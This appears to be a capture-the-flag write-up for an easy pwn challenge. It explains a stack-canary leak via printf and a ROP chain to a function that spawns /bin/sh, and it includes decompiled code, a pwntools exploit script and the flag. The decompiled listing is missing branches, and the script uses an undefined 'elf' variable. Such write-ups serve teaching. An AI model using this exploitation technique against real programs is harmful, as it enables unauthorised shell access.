Beginner - Escape the Room

  • Author: P3g4su5
  • Difficulty: Easy
  • Description : You have limited tries, try to maximize you knowledge with every try, if you feel hungry there are some cookies kept near the stack of papers
  • Attachments :


  • This one was a ROP challenge with stack canaries enebled, and PIE disabled. The goal was to first leak the canary and then perform ROP to escape function.

  • I also gave a slight hint about canary in the description if you read carefully

  • Here is the decompiled code by IDA

int __fastcall main(int argc, const char **argv, const char **envp)
  unsigned int v3; // eax
  char buf[32]; // [rsp+0h] [rbp-50h] BYREF
  char s1[40]; // [rsp+20h] [rbp-30h] BYREF
  unsigned __int64 v7; // [rsp+48h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  v3 = time(0LL);
  rand_str(s1, 30LL);
  puts("Welcome to Escape the R00m !");
  puts("You have only two chances to escape the room ...");
  printf("Enter key : ");
  read(0, buf, 0x50uLL);
  if ( !strncmp(s1, buf, 0x1EuLL) )
    puts("That was a nice escape ... But there is more to it !");
    printf("%s is not the key, try again !\n", buf);
  printf("Enter key : ");
  __isoc99_scanf("%s", buf);
  if ( !strncmp(s1, buf, 0x1EuLL) )
    puts("That was a nice escape ... But there is more to it !");
    puts("Wrong, go away !");
  return 0;

int escape()
  puts("Sweet !");
  return system("/bin/sh");
  • The program asks for a key and matches it with randomly generated key, we can predict the randomly generated key since it is using srand(time(0)) but this is not the goal
  • Given two chances, the goal is to leak the canary from first input and overflow the return address from the second input as both of them are using scanf("%s", buf) format specifier to read input.

Leaking Canary (first input)

  • printf("%s", buf) or puts(buf) both will print characters untill they encounter a null byte.
  • The actual canary is also stored on the stack at the bottom, so if we give an input such that its length reaches upto the canary in the stack, along with overwriting null byte of the canary, it will print out input along with the canary in the printf call as there is no null byte between our input and canary.
  • You can calculate the offset where the input overwrites the canary and it turns out to be 0x48

ROP (second input)

  • Now we had to perform a simple ROP at the same time placing canary at specific posision in the stack such that it properly matches the comparison operators at the end of stack and overwrite return address to address of escape function.
  • Due to stack allignment issue we will have to add an extra ret instruction gadget before the address of escape function


Here is the complete exploit :

from pwn import * 

p = process('./chal')

#First input 
p.sendlineafter("key : ", cyclic(0x48))

canary = p.recvuntil('try again !').split(b' ')[0].lstrip(cyclic(0x48))

canary = u64(b'\00' + canary[1:-1])

log.critical(f"Canary : {hex(canary)}")

#Second Input
ret = p64(0x000000000040101a)

p.sendlineafter("key : ", cyclic(72) + p64(canary) + p64(0) + ret + p64(elf.sym['escape']))


Flag : flag{unl0ck_y0ur_1m4gin4ti0ns_esc4p3_th3_r00m_0f_l1m1t4t10n5}